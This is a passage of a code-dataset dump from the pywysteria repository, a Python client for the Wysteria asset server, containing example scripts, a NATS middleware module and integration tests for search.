name=name,\n facets=cfacets\n )\n lnk._id = self.__conn.create_link(lnk)\n return lnk\n\n def _update_facets(self, facets: dict):\n \"\"\"Set given key / value pairs in item facets\n\n Args:\n facets: facets to update\n \"\"\"\n self.__conn.update_item_facets(self.id, facets)\n\n @property\n def _default_child_facets(self) -> dict:\n \"\"\"Return default facets to set on child objects\n\n Returns:\n dict\n \"\"\"\n return {\n consts.FACET_COLLECTION: self.facets.get(consts.FACET_COLLECTION),\n consts.FACET_ITEM_TYPE: self.item_type,\n consts.FACET_ITEM_VARIANT: self.variant,\n }\n\n def create_version(self, facets: dict=None) -> Version:\n \"\"\"Create the next version obj for this item\n\n Args:\n facets (dict):\n\n Returns:\n domain.Version\n 
\"\"\"\n cfacets = self._default_child_facets\n if facets:\n cfacets.update(facets)\n\n v = Version(\n self.__conn,\n parent=self.id,\n facets=cfacets\n )\n\n vid, vnum = self.__conn.create_version(v)\n v._id = vid\n v._number = vnum\n return v\n\n def get_published(self) -> Version:\n \"\"\"Gvet the current published version of this Item, if any\n\n Returns:\n domain.Version or None\n \"\"\"\n return self.__conn.get_published_version(self.id)\n\n def _get_parent(self):\n \"\"\"Return the parent item of this version\n\n Returns:\n domain.Collection or None\n \"\"\"\n results = self.__conn.find_collections(\n [QueryDesc().id(self._parent)],\n limit=1,\n )\n if results:\n return results[0]\n return None\n" }, { "alpha_fraction": 0.5738095045089722, "alphanum_fraction": 0.5753968358039856, "avg_line_length": 25.808509826660156, "blob_id": "db9d59cda508ffee8e9214e9c3e8d98d225f9124", "content_id": "54d00d3996dc8be7db82645e10e2abfba32e1e04", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1260, "license_type": "permissive", "max_line_length": 72, "num_lines": 47, "path": "/examples/03/main.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\nExample03: Searching for things\n\"\"\"\n\nimport wysteria\n\n\ndef main():\n client = wysteria.Client()\n with client:\n # create new search object\n search = client.search()\n\n # set\n search.params(item_type=\"tree\", item_variant=\"oak\")\n\n # find any & all matching items\n print(\"Items of type 'tree' and variant 'oak'\")\n items = search.find_items()\n for item in items:\n print(item)\n\n # You can add more query params to find more matches at a time.\n # Better than doing lots of single queries if you can manage it.\n # create new search object\n search = client.search()\n\n # build up a search query\n # This is understood as\n # (type \"tree\" AND variant oak) OR (type tree AND variant pine)\n print(\"items of type tree and variant oak or pine\")\n search.params(item_type=\"tree\", item_variant=\"oak\")\n search.params(item_type=\"tree\", item_variant=\"pine\")\n\n # grab matching items\n items = search.find_items()\n for item in items:\n print(item)\n\n # All items!\n print(\"Any item\")\n for item in client.search().find_items():\n print(item)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6446776390075684, "alphanum_fraction": 0.6506746411323547, "avg_line_length": 20.516128540039062, "blob_id": "701acd199ac780091501d2d3bc5da070968d520c", "content_id": "a94f4a9ccda189d67b9d61f543966805abcae868", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 667, "license_type": "permissive", "max_line_length": 76, "num_lines": 31, "path": "/examples/09/main.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\nExample09: TLS\n\"\"\"\nimport ssl\n\nimport wysteria\n\n\n_key = \"test.key\"\n_cert = \"test.crt\"\n\n\ndef ssl_context(key: str, cert: str, verify: bool=False):\n \"\"\"Simple func to create a ssl_context from the given key/cert files\n \"\"\"\n purpose = ssl.Purpose.SERVER_AUTH if verify else ssl.Purpose.CLIENT_AUTH\n tls = ssl.create_default_context(purpose=purpose)\n tls.protocol = ssl.PROTOCOL_TLSv1_2\n tls.load_cert_chain(certfile=cert, keyfile=key)\n return tls\n\n\ndef main():\n client = wysteria.Client(tls=ssl_context(_key, _cert))\n with client:\n tiles = client.get_collection(\"tiles\")\n print(tiles)\n\n\nif 
__name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5549784898757935, "alphanum_fraction": 0.556063711643219, "avg_line_length": 28.862268447875977, "blob_id": "f746157adffc5cd8925a11faaf56299f232c1cc5", "content_id": "c16fe404c920eeb0acc68d7bcd72ea291bf46b1c", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25801, "license_type": "permissive", "max_line_length": 98, "num_lines": 864, "path": "/wysteria/middleware/impl_nats.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import json\nimport threading\nimport ssl\nimport queue\n\nimport asyncio\nfrom nats.aio.client import Client as NatsClient\nfrom nats.aio import errors as nats_errors\n\nfrom wysteria.middleware.abstract_middleware import WysteriaConnectionBase\nfrom wysteria import constants as consts\nfrom wysteria import domain\nfrom wysteria import errors\n\n\n_DEFAULT_URI = \"nats://localhost:4222\" # default localhost, nats port\n_CLIENT_ROUTE = \"w.client.%s\" # From a client\n\n# wysteria nats protocol routes\n_KEY_CREATE_COLLECTION = _CLIENT_ROUTE % \"cc\"\n_KEY_CREATE_ITEM = _CLIENT_ROUTE % \"ci\"\n_KEY_CREATE_VERSION = _CLIENT_ROUTE % \"cv\"\n_KEY_CREATE_RESOURCE = _CLIENT_ROUTE % \"cr\"\n_KEY_CREATE_LINK = _CLIENT_ROUTE % \"cl\"\n\n_KEY_DELETE_COLLECTION = _CLIENT_ROUTE % \"dc\"\n_KEY_DELETE_ITEM = _CLIENT_ROUTE % \"di\"\n_KEY_DELETE_VERSION = _CLIENT_ROUTE % \"dv\"\n_KEY_DELETE_RESOURCE = _CLIENT_ROUTE % \"dr\"\n\n_KEY_FIND_COLLECTION = _CLIENT_ROUTE % \"fc\"\n_KEY_FIND_ITEM = _CLIENT_ROUTE % \"fi\"\n_KEY_FIND_VERSION = _CLIENT_ROUTE % \"fv\"\n_KEY_FIND_RESOURCE = _CLIENT_ROUTE % \"fr\"\n_KEY_FIND_LINK = _CLIENT_ROUTE % \"fl\"\n\n_KEY_GET_PUBLISHED = _CLIENT_ROUTE % \"gp\"\n_KEY_SET_PUBLISHED = _CLIENT_ROUTE % \"sp\"\n\n_KEY_UPDATE_COLLECTION = _CLIENT_ROUTE % \"uc\"\n_KEY_UPDATE_ITEM = _CLIENT_ROUTE % \"ui\"\n_KEY_UPDATE_VERSION = _CLIENT_ROUTE % \"uv\"\n_KEY_UPDATE_RESOURCE = _CLIENT_ROUTE % \"ur\"\n_KEY_UPDATE_LINK = _CLIENT_ROUTE % \"ul\"\n\n\nNATS_MSG_RETRIES = 3\n_NATS_MIN_TIMEOUT = 2 # seconds, chosen by experimentation\n\n\ndef _load_ssl_context(key, cert, verify=False):\n \"\"\"Util func to load an ssl context.\n\n Args:\n key (str): path to file\n cert (str): path to file\n verify (bool): if true, we'll verify the server's certs\n\n Returns:\n ssl_context\n \"\"\"\n purpose = ssl.Purpose.SERVER_AUTH if verify else ssl.Purpose.CLIENT_AUTH\n tls = ssl.create_default_context(purpose=purpose)\n tls.protocol = ssl.PROTOCOL_TLSv1_2\n tls.load_cert_chain(certfile=cert, keyfile=key)\n return tls\n\n\ndef _retry(func):\n \"\"\"Simple wrapper func that retries the given func some number of times\n on any exception(s).\n\n Warning: Care should be taken to use this on idempotent functions only\n\n Args:\n func:\n\n Returns:\n ?\n \"\"\"\n def retry_func(*args, **kwargs):\n for count in range(0, NATS_MSG_RETRIES + 1):\n try:\n return func(*args, **kwargs)\n except (errors.RequestTimeoutError, queue.Empty):\n if count >= NATS_MSG_RETRIES:\n raise\n return retry_func\n\n\nclass _AsyncIONats(threading.Thread):\n \"\"\"Tiny class to handle queuing requests through asyncio.\n\n Essentially, a wrapper class around the Nats.IO asyncio implementation to provide us with\n the functionality we're after. This makes for a much nicer interface to work with than\n the incredibly annoying & ugly examples https://github.com/nats-io/asyncio-nats .. 
ewww.\n \"\"\"\n\n _MAX_RECONNECTS = 10\n\n def __init__(self, url, tls):\n threading.Thread.__init__(self)\n self._conn = None\n self._outgoing = queue.Queue() # outbound messages added in request()\n self._running = False\n\n self.opts = { # opts to pass to Nats.io client\n \"servers\": [url],\n \"allow_reconnect\": True,\n \"max_reconnect_attempts\": self._MAX_RECONNECTS,\n }\n\n if tls:\n self.opts[\"tls\"] = tls\n\n @asyncio.coroutine\n def main(self, loop):\n \"\"\"Connect to remote host(s)\n\n Raises:\n NoServersError\n \"\"\"\n # explicitly set the asyncio event loop so it can't get confused ..\n asyncio.set_event_loop(loop)\n\n self._conn = NatsClient()\n\n try:\n yield from self._conn.connect(io_loop=loop, **self.opts)\n except nats_errors.ErrNoServers as e:\n # Could not connect to any server in the cluster.\n raise errors.NoServersError(e)\n\n while self._running:\n if self._outgoing.empty():\n # No one wants to send a message\n continue\n\n if not self._conn.is_connected:\n # give nats more time to (re)connect\n continue\n\n reply_queue, key, data = self._outgoing.get_nowait() # pull request from queue\n if reply_queue is None:\n # we're passed None only when we're supposed to exit. See stop()\n break\n\n try:\n result = yield from self._conn.request(key, bytes(data, encoding=\"utf8\"))\n reply_queue.put_nowait(result.data.decode())\n except nats_errors.ErrConnectionClosed as e:\n reply_queue.put_nowait(errors.ConnectionClosedError(e))\n except (nats_errors.ErrTimeout, queue.Empty) as e:\n reply_queue.put_nowait(errors.RequestTimeoutError(e))\n except Exception as e: # pass all errors up to the caller\n reply_queue.put_nowait(e)\n\n yield from self._conn.close()\n\n def request(self, data: dict, key: str, timeout: int=5) -> dict:\n \"\"\"Send a request to the server & await the reply.\n\n Args:\n data: data to send\n key: the key (subject) to send the message to\n timeout: some time in seconds to wait before calling it quits\n\n Returns:\n dict\n\n Raises:\n RequestTimeoutError\n ConnectionClosedError\n NoServersError\n \"\"\"\n q = queue.Queue(maxsize=NATS_MSG_RETRIES) # create a queue to get a reply on\n self._outgoing.put_nowait((q, key, data)) # add our message to the outbound queue\n try:\n result = q.get(timeout=max([_NATS_MIN_TIMEOUT, timeout])) # block for a reply\n except queue.Empty as e: # we waited, but nothing was returned to us :(\n raise errors.RequestTimeoutError(\"Timeout waiting for server reply. 
Original %s\" % e)\n\n if isinstance(result, Exception):\n raise result\n return result\n\n def stop(self):\n \"\"\"Stop the service, killing open connection(s)\n \"\"\"\n # set to false to kill coroutine running in main()\n self._running = False\n\n # interpreted as a poison pill (causes main() loop to break)\n self._outgoing.put((None, None, None))\n\n if not self._conn:\n return\n\n try:\n # flush & kill the actual connections\n self._conn.flush()\n self._conn.close()\n except Exception:\n pass\n\n def run(self):\n \"\"\"Start the service\n \"\"\"\n if self._running:\n return\n\n self._running = True\n\n loop = asyncio.new_event_loop()\n loop.run_until_complete(self.main(loop))\n try:\n loop.close()\n except Exception:\n pass\n\n\nclass NatsMiddleware(WysteriaConnectionBase):\n \"\"\"Wysteria middleware client using Nats.io to manage transport\n\n Using python nats client (copied & modified in libs/ dir)\n https://github.com/jackytu/python-nats/blob/master/nats/client.py\n\n \"\"\"\n def __init__(self, url: str=None, tls=None):\n \"\"\"Construct new client\n\n Url as in \"nats://user:password@host:port\"\n\n Args:\n url (str)\n tls (ssl_context)\n \"\"\"\n if not url:\n url = _DEFAULT_URI\n\n ssl_context = None\n if tls:\n if tls.enable:\n ssl_context = _load_ssl_context(tls.key, tls.cert, verify=tls.verify)\n\n self._conn = _AsyncIONats(url, ssl_context)\n\n def connect(self):\n \"\"\"Connect to remote host(s)\n\n Raises:\n Exception if unable to establish connection to remote host(s)\n \"\"\"\n self._conn.setDaemon(True)\n self._conn.start()\n\n def close(self):\n \"\"\"Close remote connection\"\"\"\n self._conn.stop()\n\n @_retry\n def _sync_idempotent_msg(self, data: dict, key: str, timeout: int=3):\n \"\"\"Send an idempotent message to the server and wait for a reply.\n\n This will be retried on failure(s) up to NATS_MSG_RETRIES times.\n\n Args:\n data (dict): json data to send\n key (str): message subject\n timeout (int): seconds to wait for reply\n\n Returns:\n dict\n\n Raises:\n errors.RequestTimeoutError\n \"\"\"\n return self._single_request(data, key, timeout=timeout)\n\n def _single_request(self, data: dict, key: str, timeout: int=5) -> int:\n \"\"\"\n\n Args:\n data: dict\n key: str (subject key)\n timeout: time in seconds to wait before erroring\n\n Returns:\n dict\n \"\"\"\n if not isinstance(data, str):\n data = json.dumps(data)\n\n reply = self._conn.request(data, key, timeout=timeout)\n return json.loads(reply)\n\n def _generic_find(self, query: list, key: str, limit: int, offset: int):\n \"\"\"Send a find query to the server, return results (if any)\n\n Args:\n query ([domain.QueryDesc]):\n key (str):\n limit (int):\n offset (int):\n\n Returns:\n []dict\n\n Raises:\n Exception on server err\n \"\"\"\n data = {\n \"query\": [q.encode() for q in query if q.is_valid],\n \"limit\": limit,\n \"offset\": offset,\n }\n\n reply = self._sync_idempotent_msg(data, key)\n\n err_msg = reply.get(\"Error\")\n if err_msg: # wysteria replied with an err, we should raise it\n raise Exception(err_msg)\n\n # the server replies with UpperCase strings, but we want to python-ise to lowercase\n return [{k.lower(): v for k, v in result.items()} for result in reply.get(\"All\", [])]\n\n def find_collections(self, query: list, limit: int=consts.DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results 
starting from some offset\n\n Returns:\n []domain.Collection\n\n Raises:\n Exception on network / server error\n \"\"\"\n return [\n domain.Collection(self, **c) for c in self._generic_find(\n query, _KEY_FIND_COLLECTION, limit, offset\n )\n ]\n\n def find_items(self, query: list, limit: int=consts.DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.Item\n\n Raises:\n Exception on network / server error\n \"\"\"\n return [\n domain.Item(self, **c) for c in self._generic_find(\n query, _KEY_FIND_ITEM, limit, offset\n )\n ]\n\n def find_versions(self, query: list, limit: int=consts.DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.Version\n\n Raises:\n Exception on network / server error\n \"\"\"\n return [\n domain.Version(self, **c) for c in self._generic_find(\n query, _KEY_FIND_VERSION, limit, offset\n )\n ]\n\n def find_resources(self, query: list, limit: int=consts.DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.Resource\n\n Raises:\n Exception on network / server error\n \"\"\"\n return [\n domain.Resource(self, **c) for c in self._generic_find(\n query, _KEY_FIND_RESOURCE, limit, offset\n )\n ]\n\n def find_links(self, query: list, limit: int=consts.DEFAULT_QUERY_LIMIT, offset: int=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.Link\n\n Raises:\n Exception on network / server error\n \"\"\"\n return [\n domain.Link(self, **c) for c in self._generic_find(\n query, _KEY_FIND_LINK, limit, offset\n )\n ]\n\n def get_published_version(self, oid: str):\n \"\"\"Item ID to find published version for\n\n Args:\n oid (str): item id to find published version for\n\n Returns:\n wysteria.domain.Version or None\n\n Raises:\n Exception on network / server error\n \"\"\"\n reply = self._sync_idempotent_msg(\n {\"id\": oid}, _KEY_GET_PUBLISHED\n )\n\n err_msg = reply.get(\"Error\")\n if err_msg:\n raise Exception(err_msg)\n\n data = reply.get(\"Version\", None)\n if not data:\n return None\n\n # the server replies with UpperCase keys, we want to pythonize to lowercase\n return domain.Version(self, **{k.lower(): v for k, v in data.items()})\n\n def publish_version(self, oid: str):\n \"\"\"Version ID mark as published\n\n Args:\n oid (str): version id to publish\n\n Raises:\n Exception on network / server error\n \"\"\"\n reply = self._sync_idempotent_msg(\n {\"id\": oid}, _KEY_SET_PUBLISHED\n )\n\n err_msg = reply.get(\"Error\")\n if err_msg:\n raise Exception(err_msg)\n\n def _sync_update_facets_msg(self, oid: str, facets: dict, key: str, find_func):\n \"\"\"Specific call to update the facets on an object matching the given `oid`\n\n Args:\n oid 
(str):\n facets (dict):\n key (str):\n find_func (func): function (str, str) -> []Version or []Item\n\n Raises:\n RequestTimeoutError\n ? Exception on network / server error\n \"\"\"\n data = json.dumps({\n \"id\": oid,\n \"facets\": facets,\n })\n find_self = [domain.QueryDesc().id(oid)]\n\n reply = {}\n for count in range(0, NATS_MSG_RETRIES + 1):\n # Fire the update request to wysteria\n try:\n reply = self._single_request(data, key)\n break # if nothing goes wrong, we break out of the loop\n except (errors.RequestTimeoutError, queue.Empty) as e:\n if count >= NATS_MSG_RETRIES:\n raise\n\n # We sent an Update and it broke, let's not retry unless our\n # change *didn't* go through\n retry = False\n matching_wysteria_objects = find_func(find_self)\n if not matching_wysteria_objects:\n break # the obj has been deleted / id invalid? Let's break\n\n # Check if the keys we want to set are set already\n matching_obj = matching_wysteria_objects[0]\n for key, value in facets.items():\n if matching_obj.facets.get(key, \"\") != str(value):\n retry = True\n break\n\n # if all our desired facets are now set, then we can break out\n if not retry:\n break\n\n err_msg = reply.get(\"Error\")\n if err_msg:\n raise Exception(err_msg)\n\n def update_version_facets(self, oid: str, facets: dict):\n \"\"\"Update version with matching ID with given facets.\n\n This is smart enough to only retry failed updates if the given update\n didn't set the desired fields when it failed.\n\n It's not perfect, but should be serviceable.\n\n Args:\n oid (str): version ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n self._sync_update_facets_msg(\n oid,\n facets,\n _KEY_UPDATE_VERSION,\n self.find_versions\n )\n\n def update_item_facets(self, oid: str, facets: dict):\n \"\"\"Update item with matching ID with given facets\n\n Args:\n oid (str): item ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n self._sync_update_facets_msg(\n oid,\n facets,\n _KEY_UPDATE_ITEM,\n self.find_items\n )\n\n def update_collection_facets(self, oid: str, facets: dict):\n \"\"\"Update collection with matching ID with given facets\n\n Args:\n oid (str): collection ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n self._sync_update_facets_msg(\n oid,\n facets,\n _KEY_UPDATE_COLLECTION,\n self.find_collections\n )\n\n def update_resource_facets(self, oid: str, facets: dict):\n \"\"\"Update resource with matching ID with given facets\n\n Args:\n oid (str): resource ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n self._sync_update_facets_msg(\n oid,\n facets,\n _KEY_UPDATE_RESOURCE,\n self.find_resources\n )\n\n def update_link_facets(self, oid: str, facets: dict):\n \"\"\"Update link with matching ID with given facets\n\n Args:\n oid (str): link ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n self._sync_update_facets_msg(\n oid,\n facets,\n _KEY_UPDATE_LINK,\n self.find_links\n )\n\n def _generic_create(\n self, request_data: dict, find_query: list, key: str, find_func, timeout: int=3\n ):\n \"\"\"Creation requests for\n - collection\n - item\n - resource\n - link\n\n Are similar enough that we can refactor 
their create funcs into one.\n Versions however, are a different animal.\n\n Args:\n request_data (dict): json data to send as creation request\n find_query ([]domain.QueryDesc): query to uniquely find the obj\n key (str): nats subject to send\n find_func: function to find desired obj\n timeout (float): time to wait before retry\n\n Returns:\n str\n \"\"\"\n reply = {}\n for count in range(0, NATS_MSG_RETRIES + 1):\n # send creation request\n try:\n reply = self._single_request(request_data, key)\n break # if nothing went wrong, we've created it successfully\n except (errors.RequestTimeoutError, queue.Empty) as e:\n if count >= NATS_MSG_RETRIES:\n raise\n\n # something went wrong, see if we created item\n results = find_func(find_query)\n if not results:\n continue # we didn't create it, try again\n\n # We did create it, return the id\n return results[0].id\n\n err_msg = reply.get(\"Error\")\n if err_msg:\n self.translate_server_exception(err_msg)\n\n return reply.get(\"Id\")\n\n def create_collection(self, collection: domain.Collection):\n \"\"\"Create collection with given name, return ID of new collection\n\n Args:\n collection (domain.Collection):\n\n Returns:\n str\n \"\"\"\n data = json.dumps({\n \"Collection\": collection.encode(),\n })\n find_query = [\n domain.QueryDesc()\n .name(collection.name)\n .parent(collection.parent)\n ]\n return self._generic_create(\n data,\n find_query,\n _KEY_CREATE_COLLECTION,\n self.find_collections\n )\n\n def create_item(self, item: domain.Item):\n \"\"\"Create item with given values, return ID of new item\n\n Args:\n item (wysteria.domain.Item): input item\n\n Returns:\n str\n\n Raises:\n Exception on network / server error\n \"\"\"\n data = json.dumps({\n \"Item\": item.encode(),\n })\n find_query = [\n domain.QueryDesc()\n .item_type(item.item_type)\n .item_variant(item.variant)\n .parent(item.parent)\n ]\n return self._generic_create(\n data,\n find_query,\n _KEY_CREATE_ITEM,\n self.find_items\n )\n\n def create_version(self, version: domain.Version):\n \"\"\"Create item with given values, return ID of new version\n\n Args:\n version (wysteria.domain.Version): input version\n\n Returns:\n str, int\n\n Raises:\n Exception on network / server error\n \"\"\"\n # We can't uniquely identify the version we're hoping to create as the\n # server will increment the version number for us.\n # We could have the wysteria server implement a version reservation\n # scheme, but since we usually only care about the published version\n # we're just going to try again ..\n # ToDo: Consider version number reservation\n reply = self._sync_idempotent_msg(\n {\n \"Version\": version.encode(),\n },\n _KEY_CREATE_VERSION\n )\n\n err_msg = reply.get(\"Error\")\n if err_msg:\n self.translate_server_exception(err_msg)\n\n return reply.get(\"Id\"), reply.get(\"Version\")\n\n def create_resource(self, resource: domain.Resource):\n \"\"\"Create item with given values, return ID of new resource\n\n Args:\n resource (wysteria.domain.Resource): input resource\n\n Returns:\n str\n\n Raises:\n Exception on network / server error\n \"\"\"\n data = json.dumps({\n \"Resource\": resource.encode(),\n })\n find_query = [\n domain.QueryDesc()\n .resource_type(resource.resource_type)\n .name(resource.name)\n .resource_location(resource.location)\n .parent(resource.parent)\n ]\n return self._generic_create(\n data,\n find_query,\n _KEY_CREATE_RESOURCE,\n self.find_resources\n )\n\n def create_link(self, link: domain.Link):\n \"\"\"Create item with given values, return ID of new link\n\n 
Args:\n link (wysteria.domain.Link): input link\n\n Returns:\n str\n\n Raises:\n Exception on network / server error\n \"\"\"\n data = json.dumps({\n \"Link\": link.encode(),\n })\n find_query = [\n domain.QueryDesc()\n .link_source(link.source)\n .link_destination(link.destination)\n ]\n return self._generic_create(\n data,\n find_query,\n _KEY_CREATE_LINK,\n self.find_links\n )\n\n def _generic_delete(self, oid: str, key: str):\n \"\"\"Call remote delete function with given params\n\n Args:\n oid (str):\n key (str):\n\n Returns:\n None\n\n Raises:\n Exception on any network / server err\n \"\"\"\n reply = self._sync_idempotent_msg(\n {\"id\": oid}, key\n )\n\n err_msg = reply.get(\"Error\")\n if err_msg:\n self.translate_server_exception(err_msg)\n\n def delete_collection(self, oid: str):\n \"\"\"Delete the matching obj type with the given id\n\n Args:\n oid (str): id of obj to delete\n\n Raises:\n Exception if deletion fails / network error\n \"\"\"\n self._generic_delete(oid, _KEY_DELETE_COLLECTION)\n\n def delete_item(self, oid: str):\n \"\"\"Delete the matching obj type with the given id\n\n (Links will be deleted automatically)\n\n Args:\n oid (str): id of obj to delete\n\n Raises:\n Exception if deletion fails / network error\n \"\"\"\n self._generic_delete(oid, _KEY_DELETE_ITEM)\n\n def delete_version(self, oid: str):\n \"\"\"Delete the matching obj type with the given id\n\n (Links will be deleted automatically)\n\n Args:\n oid (str): id of obj to delete\n\n Raises:\n Exception if deletion fails / network error\n \"\"\"\n self._generic_delete(oid, _KEY_DELETE_VERSION)\n\n def delete_resource(self, oid: str):\n \"\"\"Delete the matching obj type with the given id\n\n Args:\n oid (str): id of obj to delete\n\n Raises:\n Exception if deletion fails / network error\n \"\"\"\n self._generic_delete(oid, _KEY_DELETE_RESOURCE)\n" }, { "alpha_fraction": 0.5640794038772583, "alphanum_fraction": 0.5667870044708252, "avg_line_length": 25.380952835083008, "blob_id": "e2f80c982c19be34ead1ab117d41b292ec7af8ce", "content_id": "fa57fec16bbfef3cf30087549be52633bff064be", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1108, "license_type": "permissive", "max_line_length": 66, "num_lines": 42, "path": "/examples/02/main.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\nExample02: Getting children\n\"\"\"\n\nimport wysteria\n\n\ndef main():\n client = wysteria.Client()\n with client:\n tiles = client.get_collection(\"tiles\")\n\n # get all child items regardless of item_type / variant\n all_items = tiles.get_items()\n\n # or we can be more specific\n print(\"--items--\")\n for i in tiles.get_items(item_type=\"tree\", variant=\"oak\"):\n print(i)\n\n # we can also grab an item by ID\n item_id = all_items[0].id\n item_one = client.get_item(item_id)\n print(\"ById:\", item_id, item_one)\n\n # we can grab the published version of each\n published = []\n print(\"--versions--\")\n for i in all_items:\n published_version = i.get_published()\n published.append(published_version)\n print(published_version)\n\n # and we can grab the version resources\n print(\"--resources--\")\n for published_version in published:\n for resource in published_version.get_resources():\n print(resource)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5625564455986023, "alphanum_fraction": 0.5742999315261841, "avg_line_length": 28.32450294494629, "blob_id": "1c369916c22a88ce74ffd012ba6edbd73df38d66", 
"content_id": "8d923525bf8696b1aaf5b98ba9ffaff46f3f835c", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4428, "license_type": "permissive", "max_line_length": 96, "num_lines": 151, "path": "/tests/integration/tests/search_test.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import uuid\n\nimport wysteria\n\n\ndef _rs() -> str:\n \"\"\"Create and return some string at random\n\n Returns:\n str\n \"\"\"\n return uuid.uuid4().hex\n\n\nclass TestSearch:\n \"\"\"Tests for the Search class\"\"\"\n\n @classmethod\n def setup_class(cls):\n cls.client = wysteria.default_client()\n cls.client.connect()\n\n cls.common_facets = {\n _rs(): _rs(),\n }\n\n cls.collection1 = cls.client.create_collection(_rs(), facets=cls.common_facets)\n cls.collection2 = cls.client.create_collection(_rs(), facets=cls.common_facets)\n cls.item1 = cls.collection1.create_item(_rs(), _rs(), facets=cls.common_facets)\n cls.item2 = cls.collection2.create_item(_rs(), _rs(), facets=cls.common_facets)\n cls.version1 = cls.item1.create_version(facets=cls.common_facets)\n cls.version2 = cls.item2.create_version(facets=cls.common_facets)\n cls.link1 = cls.version1.link_to(_rs(), cls.version2, facets=cls.common_facets)\n cls.link2 = cls.item1.link_to(_rs(), cls.item2, facets=cls.common_facets)\n cls.resource1 = cls.version1.add_resource(_rs(), _rs(), _rs(), facets=cls.common_facets)\n cls.resource2 = cls.version2.add_resource(_rs(), _rs(), _rs(), facets=cls.common_facets)\n\n @classmethod\n def teardown_class(cls):\n cls.client.close()\n\n def test_search_pagination(self):\n # arrange\n item = self.collection1.create_item(_rs(), _rs())\n expected = [item.create_version() for _ in range(0, 100)]\n\n s = self.client.search()\n s.params(parent=item.id)\n\n limit = 10\n offset = 0\n found = limit + 1\n all_results = []\n\n # act & assert\n while found >= limit:\n results = s.find_versions(limit=limit, offset=offset)\n\n assert len(results) <= limit\n for r in results:\n assert r not in all_results\n\n offset += limit\n found = len(results)\n all_results.extend(results)\n\n assert len(expected) == len(all_results)\n for r in all_results:\n assert r in expected\n for r in expected:\n assert r in all_results\n\n @staticmethod\n def _perform_uri_search_test(fn, expected):\n # act\n result = fn(limit=10)\n\n # assert\n assert len(result) == 1\n assert result[0].uri == expected.uri\n assert result[0] == expected\n\n def test_uri_search_collection(self):\n # arrange\n expected = self.collection1\n s = self.client.search()\n s.params(uri=expected.uri)\n\n # act\n self._perform_uri_search_test(s.find_collections, expected)\n\n def test_uri_search_item(self):\n # arrange\n expected = self.item1\n s = self.client.search()\n s.params(uri=expected.uri)\n\n # act\n self._perform_uri_search_test(s.find_items, expected)\n\n def test_uri_search_versions(self):\n # arrange\n expected = self.version1\n s = self.client.search()\n s.params(uri=expected.uri)\n\n # act\n self._perform_uri_search_test(s.find_versions, expected)\n\n def test_uri_search_resources(self):\n # arrange\n expected = self.resource1\n s = self.client.search()\n s.params(uri=expected.uri)\n\n # act\n self._perform_uri_search_test(s.find_resources, expected)\n\n def test_uri_search_links(self):\n # arrange\n expected = self.link1\n s = self.client.search()\n s.params(uri=expected.uri)\n\n # act\n self._perform_uri_search_test(s.find_links, expected)\n\n def test_facet_search(self):\n # 
arrange\n s = self.client.search()\n s.params(facets=self.common_facets)\n\n expected = [\n (s.find_collections, [self.collection1, self.collection2]),\n (s.find_items, [self.item1, self.item2]),\n (s.find_versions, [self.version1, self.version2]),\n (s.find_resources, [self.resource1, self.resource2]),\n (s.find_links, [self.link1, self.link2]),\n ]\n\n for fn, expected_results in expected:\n # act\n results = fn(limit=10)\n\n # assert\n assert len(results) == len(expected_results)\n for r in results:\n assert r in expected_results\n\n for r in expected_results:\n assert r in results\n" }, { "alpha_fraction": 0.7486573457717896, "alphanum_fraction": 0.7486573457717896, "avg_line_length": 24.86111068725586, "blob_id": "6fd9c8e49169c52138e529524921e017b7238200", "content_id": "628f99c6423e42cf2fd21e55556e0ae8adc499da", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1862, "license_type": "permissive", "max_line_length": 95, "num_lines": 72, "path": "/wysteria/__init__.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"The wysteria module provides a python interface for talking to a wysteria asset 